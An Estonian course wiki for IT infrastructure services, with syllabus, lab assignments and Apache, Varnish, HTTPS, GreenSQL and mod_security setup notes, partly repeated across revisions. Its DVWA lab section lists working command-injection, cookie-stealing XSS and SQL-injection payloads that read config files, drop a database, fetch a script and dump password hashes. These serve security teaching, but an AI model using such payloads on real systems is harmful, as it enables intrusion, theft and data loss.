==Labor 5 - mõne veebirakenduse (nt Wordpress) paigaldamine ja turvamine varnishiga (10p/10%)==

Labori eesmärgiks on paigaldada veebirakendus, mõõta selle jõudlust ja seejärel suurendada veebirakenduse jõudlust kasutades puhvermälu. Veebirakenduse ja puhvermälu võib iga tudeng ise valida. Näite teeme WordPress ja WP SuperCace abil. Samas on väga soovitatav valida cache tehnoloogia ise, et erinevad inimesed saaksid võrrelda erinevaid asju.

* Wordpress paigaldamine https://docs.google.com/document/d/1AKVigVudVjxQuCz02i6p4Kv8oO4RD6aJiV9pbPuujZY/edit?pli=1

* Wordpress paigaldamine ja jõudluse testimine (varnish)
[[WordPress turvamine]]

http://wpdevshed.com/top-cache-plugins-wordpress/

[[Varnish]] - vaata http://www.howtoforge.com/putting-varnish-in-front-of-apache-on-ubuntu-debian
[[Apache logide seadistus]]

==Labor 6 - DVWA paigaldamine ja OWASP testimine (10p/10%)==

Paigaldage DVWA: https://wiki.itcollege.ee/index.php/DVWA

Loe läbi OWASP top 10 ja [http://enos.itcollege.ee/~ttanav/VRI/abiks/mysql_tut.php SQL põhitõed]

Mõned videod:

* https://www.youtube.com/watch?v=CDbWvEwBBxo

==Labor 7 - rakenduste tulemüürid (greensql ja mod_security baasil) (10p/10%)==

==Labor 8 - IDS (10p/10%)==

Seadistada IDS/IPS ühele oma valitud serverile ja demonstreeida ühe-kahe reegli toimimist.

Juhend: https://wiki.itcollege.ee/index.php/IDS_Systeemid_-_Labor_1

Abistav materjal: https://wiki.itcollege.ee/index.php/Suricata

==Questid, millede eest saab punkte==

Quest 1 (Läbi ja tehtud) - https://docs.google.com/document/d/1oRt9JLF6lcf_Z-ReHCfbZXnSoc-EOBzGprxvIyhq4qk/edit?usp=sharing

=Esitatud referaadid=
[[IT infrastruktuuri teenused 2013 kevad]]

[[Wordpressi turvalisuse suurendamine]]

=Juurteenuste kursus=
[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused.html Interneti juurteenused]

=Täiendav lugemismaterjal=
[https://zib.wooop.biz/category/asd/ Erinevad juhendmaterjalid Linuxi teenuste jm seadistamiseks. Autor Gert Vaikre A21]

=Vanad loengumaterjalid=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng00%20-%20Sissejuhatav%20loeng.odp Loeng 00 - Sissejuhatav loeng - NB Tähtajad ja nõuded]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng01%20-%20E-post.odp Loeng 01 E-post]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.odp Loeng 03 Failiserver]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Loeng 04 Veebiserver]

[http://goo.gl/6XQ0U WordPress seadistamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Loeng 05 Dokumentatsioon]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng06%20-%20VPN.odp Loeng 06 VPN]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng07%20-%20iptables.odp Loeng 07 Tulemüürid]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng08%20-%20SAN%20-%20NAS%20-%20CAS.odp Loeng 08 SAN NAS CAS]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng09%20-%20Virtualiseerimine.odp Loeng 09 Virtualiseerimine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng10%20-%20DHCP.odp Loeng 10 DHCP]

Category:I375/I803/I853 IT Infrastructure services

2015-05-11T07:08:08Z

Mernits: /* Labor 8 - IDS (10p/10%) */

=Üldinfo=
Aine info: [https://itcollege.ois.ee/study-material/round?round_id=2230 IT infrastruktuuri teenused ÕIS leht]

[http://enos.itcollege.ee/~mernits/infrastruktuur/ Aine õppematerjalid]

ECTS: 5

Hindamisviis: Arvestus

'''Rangelt soovituslik aine:''' Operatsioonisüsteemide administreerimine ja sidumine (I233)

==Õppejõud==
Margus Ernits >> margus (.) ernits (ät) itcollege (.) ee

Katrin Loodus >> katrin (.) loodus (ät) itcollege (.) ee

=Eesmärk ja sisu=
Tutvustada IT infrastruktuuri teenuste põhimõisteid. Anda oskused põhiliste teenuste paigaldamiseks ja turvamiseks. Anda oskused IT infrastruktuuri teenuste dokumenteerimiseks.
Eesmärgi saavutamiseks toimuvad laboratoorsed tööd, mille käigus installeeritakse ja konfigureeritakse teenuseid pöörates rõhku teenuse turvalisusele, millele eelnevad loengud alus- ja põhimõistete tutvustamiseks.

=Ainekaart=
Ainekaardi viimase, kuid mitte lõpliku versiooni leiab [https://wiki.itcollege.ee/images/6/67/I385_IT_infrastruktuuri_teenused_aineprogramm_2013.odt siit]

=Eelmiste aastate tagasiside=
[https://wiki.itcollege.ee/images/e/e3/Tagasiside.p%C3%A4eva%C3%B5pe-2013.pdf 2013 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/4/4d/It-infra-tagasiside-2012-1.pdf 2012 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/2/28/It-infra-tagasiside-2012-2.pdf 2012 päevaõppe tagasiside]

=Arvestus ja hindamine=

Aine on jagatud praktilisteks ja teoreetilisteks töödeks. Kaheksaks (8) laboriks ning kaheks (2) teoreetiliseks kontrolltööks.

Lisaks on tarvis teha eraldi dokumentatsiooni ehk ühe kaitstud labori kohta '''viki artikkel'''.

'''Praktiliste tööde''' hulka kuuluvad erinevate teenuste paigaldamine ning seadistamine. Ühe labori eest on võimalik saada maksimaalselt 6 punkti.

* 2 punkt on võimalik saada teenuse seadistamise, paigaldamise ning suulise kaitsmise eest. (Õppejõud võib seadistust muuta ning paluda paranduste kohta selgitust)
* 4 punkti on võimalik saada, kui kaitsta oskuslikult konkreetse labori kohta käivad teoreetilised teadmised suuliselt õppejõule. (Küsimused esitab õppejõud)
* 6 punkti on võimalik saada, kui parandada konkreetse teema kohta käivat juhendit ning esitada tulemuse õppejõule. (Mõeldud ambitsioonikamatele tudengitele)

Lävendiks on 2 punkt, mis tähendab praktilise osa teostust. Kui iga labori eest on ainult 2 punkt, tuleb teoreetilised teadmised kaitsta kontrolltöö käigus, aga kui iga labori eest on vähemalt 4 punkti, ei ole kontrolltööd tarvis teha.

==Tähtajad päevaõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3): 16. märts

Praktilise töö laborite kaitsmised (Laborid 4-6): 18. mai

Praktilise töö labori kaitsmised (Labor 8): ~20. mai

Dokumentatsioon (viki artikkel): 25. mai

Kontrolltöö 1: 16. märts

Kontrolltöö 2: 18. mai

==Tähtajad kaugõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3):

Praktilise töö laborite kaitsmised (Laborid 4-6):

Praktilise töö labori kaitsmised (Labor 8):

Dokumentatsioon (viki artikkel):

Kontrolltöö 1:

Kontrolltöö 2:

=Loengud=

'''Kaugõppe 2015. aasta kevadsemestri loengusalvestused on leitavad [https://echo360.e-ope.ee/ess/portal/section/57596897-5ba5-46cb-b1b2-b4a4619f5eb0 siit]'''

[http://enos.itcollege.ee/~mernits/infrastruktuur/loeng00%20-%20Sissejuhatav%20loeng.odp Sissejuhatav loeng] - NB siin on kirjas hindamiskriteeriumid ja tähtajad. Lisaks on kirjas kontrolltööde ajad ja muu aine läbimiseks oluline info. (Päevaõppes toimus 02.02.2014)

[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused-ntp.html NTP teenus] (Päevaõppes toimus 02.02.2015)

[https://www.us-cert.gov/ncas/alerts/TA14-013A NTP amplification Attack]

Kodutöö nr 1. Tähtaeg 9.02.2015. DNS loenguks lugeda läbi DNS põhimõisted järgnevatest materjalidest:

Kohustuslik:
http://kuutorvaja.eenet.ee/wiki/DNS_ja_BIND

Soovituslik:
http://kuutorvaja.eenet.ee/wiki/DNS

[http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.odp DNS loeng (OpenDocument)] [http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.pdf (PDF)]

[http://elab.itcollege.ee:8000/infra/bind/ BIND9 konfiguratsiooni näitefailid]

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS näide]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Infra%20loeng%20DHCP%202013.odp DHCP loeng]

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit# DHCP näitelabor]

[https://docs.google.com/document/d/14Cj90aWN4n4MCO_zZlZzu0aHJeIDTPEfQgiDXIuMxF4/edit# DNS uuendamine DHCP abil]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Veebiserveri loeng]

Screencast veebiserveri konfigureerimisest:

http://elab.itcollege.ee:8000/veebiserver/out-1.ogv

http://elab.itcollege.ee:8000/veebiserver/out-2.ogv

http://elab.itcollege.ee:8000/veebiserver/out-3.ogv

Kodutöö nr 2. Tähtaeg 20.aprill.2015. Lugeda läbi [http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP top 10 2013] 

=Mõisted kontrolltööks ja arvestuseks=

'''Esimese kontrolltöö küsimused:'''

*DNS mõistete kohta leiab infot: http://kuutorvaja.eenet.ee/wiki/DNS
*hostinimi (mis märgid on hostinimes lubatud ja kus?)
*host täisnimi
*domeeni täisnimi
*DNS
*A-kirje
*alias ehk CNAME
*puhverdamine
*dig ja selle kasutamine
*DNS spoofing
*domeen ja domeeninimi
*Authoritative ehk pädev server
*Forwarding ehk edastamine
*FQDN
*Host
*PTR-kirje
*rekursiivne lahendus
*primaarne server
*sekundaarne server
*open resolver
*kuidas nimelahendus töötab, kirjelda näiteks "kui veebisirvijas avatakse leht, siis mis võiks toimuda?"
*selgitage näitekonfi
<pre>
$TTL 600
@ IN SOA planet.zz. root.planet.zz. (
3 ; Serial - Mida see tähendab?
3600 ; Refresh - Mida see tähendab?
8640 ; Retry - Mida see tähendab?
36000 ; Expire - Mida see tähendab?
3600 ) ; Negative Cache TTL - Mida see tähendab?
;

</pre>

'''Teise kontrolltöö küsimused:'''

*virtuaalhost
*http
*Kuidas toimub ssl/tls ühenduse algatamine?
*Mis vahe on sümmeetrilisel ja asümmeetrilisel krüpteerimisel?
*Mis vahe on avalikul võtmel ja sertifikaadil?
*https
*SNI
*IPS
*IDS
*Mis vahe on reflected XSS ja stored XSS rünnetel?
*Mis vahe on SQL injectionil ja blind SQL injectionil?
*Mis on secure cookie? (http://php.net/session.cookie-secure ;session.cookie_secure =)
*Mis tähendab, et küpsised on http_only?
*Kas XSS ründeid saab filtreerida andmebaasikihis, näiteks SQL tulemüüriga?
*Mis on CSRF ja kuidas see toimib?
*Mis on same origin policy?

=Abimaterjal=
* [http://tools.ietf.org/html/rfc2131 RFC2131]
* [http://kuutorvaja.eenet.ee/wiki/Isc-dhcpd_server Kuutõrvaja DHCP materjal]

Abimaterjal laboriks:
* Maskeraad [[Ufw]]
* DHCP serveri seadistamine [[DHCP]]
* [http://www.debian-administration.org/article/343/Configuring_Dynamic_DNS__DHCP_on_Debian_Stable Dünaamiline DNS kirjete uuendamine DHCP poolt]
* [http://debianclusters.org/index.php/Troubleshooting_DHCP DHCP probleemide lahendamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng11%20-%20Monitooring.odp Loeng 11 Monitooring]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng12%20-%20LDAP.odp Loeng 12 LDAP]

=Praktilised tööd=

[https://docs.google.com/spreadsheets/d/1TiErlKTrnW3T_dcjceMyeLr9yCHBDwTmjXDxkAf1hDw/edit?usp=sharing Nimekiri] DNS labori masinate IP vahemikega ning domeeninimedega

==Sissejuhatav praktikum==

Valige endale domeeninimi, näiteks eikkasutaja.zz.

Seadke DNS serverile IP aadress 192.168.56.201
<source lang="bash">
nano /etc/network/interfaces # Avab võrguliideste faili.
# DNS serveri eth1 võrguliidesel tuleb muuta esialgne IP-address 192.168.56.200 uueks IP-addressiks 192.168.56.201
auto eth1
iface eth1 inet static
address 192.168.56.201
netmask 255.255.255.0
</source>

Taaskäivitage võrguliides '''eth1'''
<source lang="bash">
ifdown eth1 && ifup eth1
</source>

Muutke DNS serveril hostinimi ns.sinudomeen.
<source lang="bash">
echo ns > /etc/hostname
</source>
Muutke /etc/hosts failis masinanimi

127.0.1.1 ns.sinudomeen ns

Näiteks valisin oma domeeniks mernits.zz

127.0.1.1 ns.mernits.zz ns

startige teenus '''hostname'''
<source lang="bash">
service hostname start
</source>

Korraldus hostname -f peab tagastama FQDN-i
<source lang="bash">
hostname -f
</source>

Seadistage ka võtmetepõhine autentimine [[OpenSSH: võtmetega autentimine]]

[[Image:Infra-a21-2015.png|thumb|Kasutatav võrk]]

==Labor 1 - NTP seadistamine (6p/6%)==
Loe läbi õppematerjal (loengud) ja seadista NTP teenus nii kliendis, kui ka serveris selliselt, et klient küsib aega ainult serverist (ja ka localhostist, mille prioriteet on madal e fudge 10) Server küsib aega EENET NTP serverist ja mõnest muust Eestis asuvast NTP serverist.

Seadistage server selliselt, et ei välisvõrgust ei saa teha järgmisel lingil kirjeldatud rünnet https://www.us-cert.gov/ncas/alerts/TA14-013A

[[NTP Ubuntus]]

==Labor 2 - DNS seadistamine (6p/6%)==

*Mõtle välja endale domeeninimi
*Loo domeeninimele tsoonifail ja seadiste nimeserver
*Luba rekursiivne lahendus oma sisevõrgust
*Loo reevers tsoon
*Loo A kirjed e-posti, nimeserveri jaoks
*Loo CNAME kirjed www, samba ja oma severi jaoks

Näitelahendus [https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit Domain Name Server ehk nimeserveri labor]

Näitelahendus2 [[Nimeserveri labor V.2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/dns/DNS_BIND.html Väike abiinfo lisaks loengule]

Kaitsmisel pead oskama luua uut tsooni, lisama kirjeid, oskama kasutada rndc, dig, nslookup vahendeid.

==Labor 3 - DHCP seadistamine (6p/6%)==
* DHCP paigaldamine ja seadistamine (6p)

Seadista labori desktop VM saamaks IP aadressi ja nimeserverit sama labori serveri VM käest.

PS: desktop võrguseadetest eemalda esimeselt liideselt nimelahenduse küsimine (küsitakse DHCP abil ainult IP aadress). Kui seda ei tee, siis lähevad DNS päringud ikkagi esimese, NAT liidese kaudu.

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit DHCP näitelabor]

==Labor 4 - apache (või nginx) veebiserveri seadistamine (6p/6%)==
* Loo kaks virtualhosti nii http, kui ka https (self-signed cert) tarbeks.
** Mõlemad nimied peavad sirvijas töötama (desktop arvutis) nii http, kui ka https abil ja esilehel peab olema selgelt näha kumma virutalhostiga on tegemist. Seega index.html sisse lisa virtualhosti nimi.

* Abimaterjalina võib sobida: Apache2 paigaldamine ja virtualhostide seadistamine [[Virtualhost apache2 näitel]]. Algajale lisamaterjal [[Veebiserveri labor v.2]]

==Labor 5 - mõne veebirakenduse (nt Wordpress) paigaldamine ja turvamine varnishiga (10p/10%)==

Labori eesmärgiks on paigaldada veebirakendus, mõõta selle jõudlust ja seejärel suurendada veebirakenduse jõudlust kasutades puhvermälu. Veebirakenduse ja puhvermälu võib iga tudeng ise valida. Näite teeme WordPress ja WP SuperCace abil. Samas on väga soovitatav valida cache tehnoloogia ise, et erinevad inimesed saaksid võrrelda erinevaid asju.

* Wordpress paigaldamine https://docs.google.com/document/d/1AKVigVudVjxQuCz02i6p4Kv8oO4RD6aJiV9pbPuujZY/edit?pli=1

* Wordpress paigaldamine ja jõudluse testimine (varnish)
[[WordPress turvamine]]

http://wpdevshed.com/top-cache-plugins-wordpress/

[[Varnish]] - vaata http://www.howtoforge.com/putting-varnish-in-front-of-apache-on-ubuntu-debian
[[Apache logide seadistus]]

==Labor 6 - DVWA paigaldamine ja OWASP testimine (10p/10%)==

Paigaldage DVWA: https://wiki.itcollege.ee/index.php/DVWA

Loe läbi OWASP top 10 ja [http://enos.itcollege.ee/~ttanav/VRI/abiks/mysql_tut.php SQL põhitõed]

Mõned videod:

* https://www.youtube.com/watch?v=CDbWvEwBBxo

==Labor 7 - rakenduste tulemüürid (greensql ja mod_security baasil) (10p/10%)==

==Labor 8 - IDS (10p/10%)==

Seadistada IDS/IPS ühele oma valitud serverile ja demonstreeida ühe-kahe reegli toimimist.

Juhend: https://wiki.itcollege.ee/index.php/IDS_Systeemid_-_Labor_1

Abistav materjal: https://wiki.itcollege.ee/index.php/Suricata

==Questid, millede eest saab punkte==

Quest 1 (Läbi ja tehtud) - https://docs.google.com/document/d/1oRt9JLF6lcf_Z-ReHCfbZXnSoc-EOBzGprxvIyhq4qk/edit?usp=sharing

=Esitatud referaadid=
[[IT infrastruktuuri teenused 2013 kevad]]

[[Wordpressi turvalisuse suurendamine]]

=Juurteenuste kursus=
[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused.html Interneti juurteenused]

=Täiendav lugemismaterjal=
[https://zib.wooop.biz/category/asd/ Erinevad juhendmaterjalid Linuxi teenuste jm seadistamiseks. Autor Gert Vaikre A21]

=Vanad loengumaterjalid=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng00%20-%20Sissejuhatav%20loeng.odp Loeng 00 - Sissejuhatav loeng - NB Tähtajad ja nõuded]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng01%20-%20E-post.odp Loeng 01 E-post]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.odp Loeng 03 Failiserver]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Loeng 04 Veebiserver]

[http://goo.gl/6XQ0U WordPress seadistamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Loeng 05 Dokumentatsioon]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng06%20-%20VPN.odp Loeng 06 VPN]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng07%20-%20iptables.odp Loeng 07 Tulemüürid]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng08%20-%20SAN%20-%20NAS%20-%20CAS.odp Loeng 08 SAN NAS CAS]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng09%20-%20Virtualiseerimine.odp Loeng 09 Virtualiseerimine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng10%20-%20DHCP.odp Loeng 10 DHCP]

Virtualhost apache2 näitel

2015-05-04T10:19:40Z

Mernits: /* installeerimine */

[[Category:IT infrastruktuuri teenused]]
=Apache seadistamine=

<pre>
/etc/hosts

192.168.56.101 www.planet.zz
192.168.56.101 sales.planet.zz
</pre>

<source lang="bash">

ping www.planet.zz

ping sales.planet.zz

apt-get update
apt-get dist-upgrade

apt-get install apache2

mkdir -p /var/www/www.planet.zz
mkdir -p /var/www/sales.planet.zz
cp /var/www/index.html /var/www/www.planet.zz

cat >> /etc/network/interfaces <<EOL
auto eth1:0
iface eth1:0 inet static
address 192.168.56.201
netmask 255.255.255.0

EOL

ifup eth1:0

cp /var/www/index.html /var/www/sales.planet.zz
vim /var/www/www.planet.zz/index.html
vim /var/www/sales.planet.zz/index.html
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/www.planet.zz
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/sales.planet.zz

vim www.planet.zz
vim sales.planet.zz

a2ensite www.planet.zz
a2ensite sales.planet.zz
service apache2 reload

</source>

=WordPress tuning=

<source lang="apache">
<VirtualHost *:80>
ServerAdmin webmaster@localhost
ServerName wp.planet.zz
DocumentRoot /var/www/wordpress
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /var/www/wordpress>
Options Indexes FollowSymLinks MultiViews
AllowOverride All
Order allow,deny
allow from all
</Directory>

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
<Directory "/usr/lib/cgi-bin">
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
</Directory>

ErrorLog ${APACHE_LOG_DIR}/error.log

# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn

CustomLog ${APACHE_LOG_DIR}/access.log combined

Alias /doc/ "/usr/share/doc/"
<Directory "/usr/share/doc/">
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from 127.0.0.0/255.0.0.0 ::1/128
</Directory>

</VirtualHost>

</source>

Pange tähele muudetud Directory seadeid.
<Directory /var/www/wordpress>
AllowOverride All

<source lang="bash">
echo '-1000' > /proc/$(pidof mysqld)/oom_score_adj
a2enmod rewrite
a2enmod headers
a2enmod expires

</source>

Selle rea võib lisada alglaadimisel käivitatavasse faili ''/etc/rc.local''

Paigaldage oma valitud cace plugin wordpressile.

=Varnish=
Esmaselt tõstame apache2 porti 8080

<pre>
/etc/apache2/ports.conf
NameVirtualHost *:8080
Listen 8080
</pre>
<source lang="bash">
cd /etc/apache2/sites-available
sed 's/:80/:8080/' default -i
sed 's/:80/:8080/' wp -i
sed 's/:80/:8080/' sales.planet.zz -i
sed 's/:80/:8080/' www.planet.zz -i

#testimiseks
grep ':80' *

service apache2 restart

#testimiseks
netstat -lntp

#installeerime varnish cache
apt-get install varnish
vim /etc/default/varnish
</source>
<pre>
DAEMON_OPTS="-a :80 \
-T localhost:6082 \
-f /etc/varnish/default.vcl \
-S /etc/varnish/secret \
-s malloc,256m"
</pre>
Faili /etc/varnish/default.vcl lisada X-Forwarded-For sedmine
<pre>
sub vcl_recv {

# Add a unique header containing the client address

remove req.http.X-Forwarded-For;

set req.http.X-Forwarded-For = client.ip;

# [...]

}

</pre>
<source lang="bash">
service varnish restart
</source>

Nüüd tuleb seadistada apache veebiserver selliselt, et logis kasutatakse seda custom-logi formaati. Selleks tuleb avada soovitud veebiserveri konfiguratsioon asukohas:

<source lang="bash">
cd /etc/apache2/sites-available/
</source>
Avage soovitud veebiserveri konfiguratsioonifail. Antud näites kasutan "wp"-nimelist faili.

<source lang="bash">
nano wp
</source>

Sinna tuleb kirjutada CustomLog'i rea asemele

<source lang="bash">
CustomLog ${APACHE_LOG_DIR}/access.log varnishcombined
</source>

Nüüd tuleb muuta apache2 konfiguratsiooni, kuhu tuleb seadistada varnishcombined logiformaat. Selleks liigu asukohta

<source lang="bash">
cd /etc/apache2/conf.d/
</source>

Tee sinna uus fail nimega näiteks '''varnishlog.conf'''
<source lang="bash">
nano varnishlog.conf
</source>

Kirjuta sinna see rida
<source lang="bash">
LogFormat "%{X-Forwarded-For}i %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" varnishcombined
</source>

Tee apache2 teenusele restart
<source lang="bash">
service apache2 restart
</source>

=DVWA ründed=
=HTTPS konfigureerimine=

ssh-keygen

Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /etc/ssl/private/www.planet.zz.key
<pre>
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /etc/ssl/private/www.planet.zz.key.
Your public key has been saved in /etc/ssl/private/www.planet.zz.key.pub.
The key fingerprint is:
76:6e:6a:b4:1b:75:7e:39:18:12:59:ee:9c:4c:b9:ef root@server
The key's randomart image is:
+--[ RSA 2048]----+
| . |
| + . |
| o + |
| * o |
| S + O |
| ..+ + + . |
| ...o o = |
| o+ o . |
| .o. E |
+-----------------+
</pre>

openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req

<pre>
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:EE
State or Province Name (full name) [Some-State]:Harjumaa
Locality Name (eg, city) []:Tallinn
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Planet
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:www.planet.zz
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

</pre>

sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem

<pre>
Signature ok
subject=/C=EE/ST=Harjumaa/L=Tallinn/O=Planet/OU=IT/CN=www.planet.zz
Getting Private key
</pre>

cp /etc/apache2/sites-available/default-ssl /etc/apache2/sites-available/www.planet.zz-ssl

Seal muuta sisu (sert, dokument root, keyfail)

Lisa ServerName, Muuda DocumentRoot, Muuda SSLCertificateFile ja SSLCertificateKeyFile

<pre>
ServerName www.planet.zz
DocumentRoot /var/www/www.planet.zz
SSLCertificateFile /etc/ssl/certs/www.planet.zz.pem
SSLCertificateKeyFile /etc/ssl/private/www.planet.zz.key
</pre>

a2enmod ssl

a2ensite www.planet.zz-ssl

service apache2 restart

=ID kaart=

[[ID kaardiga autentimine Apache2 veebiserveriga]]

=DVWA ründed=
==cmd exec==
<source lang="bash">
8.8.8.8; sed 's/</UUUU/' ../../config/config.inc.php
</source>

<source lang="bash">
8.8.8.8; ls -l
8.8.8.8; ls -l ../
8.8.8.8; ls -l ../../
#jne, kuni kõik failid/kataloogid on teada
8.8.8.8; sed 's/<//' ../../../../wordpress/wp-config.php
</source>

Loon faili kala /var/tmp kataloogi
<source lang="bash">
8.8.8.8; touch /var/tmp/kala.txt
</source>

Ning kontrollin kas fail loodi
<source lang="bash">
8.8.8.8; ls /var/tmp/
</source>

kustutada andmebaas (eelnevalt uurida andmebaasi nime ning parooli):
<source lang="bash">
8.8.8.8;mysqladmin DROP dvwa -y;
</source>

kuvada failide infot:
<source lang="bash">
8.8.8.8;cat /etc/apache2/sites-enabled/www.planet.zz
</source>

skripti laadimine serverisse ning sellele käivitusbiti andmine:
<source lang="bash">
8.8.8.8; wget http://enos.itcollege.ee/~kloodus/osadmin/skript.sh -O /var/tmp/skript; chmod +x /var/tmp/skript/skript.sh
</source>

Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution'it (XSS auku pole leitud, ei saa kasutada, ...)
<source lang="bash">
; grep session.cookie_httponly /etc/php5/apache2/php.ini
</source>
Väljund:
* kui küpsised ei ole JavaScriptile loetavad, siis on väljund selline:

'''session.cookie_httponly = 1'''

* kui küpsised on JavaScriptile loetavad, siis on väljund selline (HINT: Tegutse ruttu! :))

'''session.cookie_httponly = 0'''

==XSS==
<source lang="javascript">
<script>var i='<img src="http://192.168.56.101/'+document.cookie+'" />'; document.write(i);</script>
</source>
==veel XSSi==
<pre>
%3Cscript%3Evar+i%3D%27%3Cimg+src%3D%22http%3A%2F%2F192.168.56.101%2F%27%2Bdocument.cookie%2B%27%22+%2F%3E%27%3B+document.write%28i%29%3B%3C%2Fscript%3E
</pre>
==SQLi==
<source lang="sql">
#blind
1' union select BENCHMARK(100000000,ENCODE('hello','goodbye')),1; # --

2' union select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;# --

3' union select TABLE_NAME,COLUMN_NAME from information_schema.columns; # --

4' union select user_login,user_pass from wp.wp_users; #

3' union select TABLE_NAME,concat(COLUMN_NAME,'-','LISA') from information_schema.columns; #
</source>

=GreenSQL firewall=

<source lang="bash">
wget http://elab.itcollege.ee:8000/Day3/greensql-fw_1.3.0_amd64.deb

dpkg -i greensql-fw_1.3.0_amd64.deb

apt-get install -f

#Modify existing virtualhost or create new virtualhost.

cd /var/www/EXISTINGORNEW
ln -s /usr/share/greensql-fw/ greensql

cd greensql
chmod 0777 templates_c
</source>

Kasutajanimi veebiliidesel on '''admin''' ja parool '''pwd'''.

Muutke DVWA config failis andmebaasi asukohta:

<pre>
$_DVWA[ 'db_server' ] = '127.0.0.1:3305';
</pre>

<source lang="bash">
#lisage faili /etc/rc.local järgmine ride ENNE exit 0 rida
service greensql-fw start
</source>

=modsecurity=
==installeerimine==

<source lang="bash">
apt-get install libapache2-mod-security2
</source>

Muutke faili '''/etc/apache2/mods-available/security2.conf'''

<source lang="apache">
<IfModule security2_module>
# Default Debian dir for modsecurity's persistent data
SecDataDir /var/cache/modsecurity

# Include all the *.conf files in /etc/modsecurity.
# Keeping your local configuration in that directory
# will allow for an easy upgrade of THIS file and
# make your life easier
IncludeOptional /etc/modsecurity/*.conf
IncludeOptional /usr/share/modsecurity-crs/base_rules/*.conf
IncludeOptional /usr/share/modsecurity-crs/activated_rules/*.conf

SecRuleEngine On

</IfModule>

</source>

Teeme nimelingi modsecurity reeglite seadistamiseks:

<source lang="bash">
ln -s /usr/share/modsecurity-crs/modsecurity_crs_10_setup.conf /etc/modsecurity/
</source>

=Apache2 tweaks=
<source lang="apache">
ServerSignature Off
ServerTokens Prod
</source>

http://chandank.com/webservers/apache/apache-web-server-hardening-security?start=3

== Apache testimine ==
Lisaks ab'le on olemas ka teisi utiliite:

1.Apache JMeter - http://jmeter.apache.org/download_jmeter.cgi 
2. httperf - http://www.hpl.hp.com/research/linux/httperf/download.php 
3. OpenWebLoad - http://openwebload.sourceforge.net/#download 
4. Allmon - https://code.google.com/p/allmon/downloads/list 
5. CLIF - http://clif.ow2.org/download/index.html 
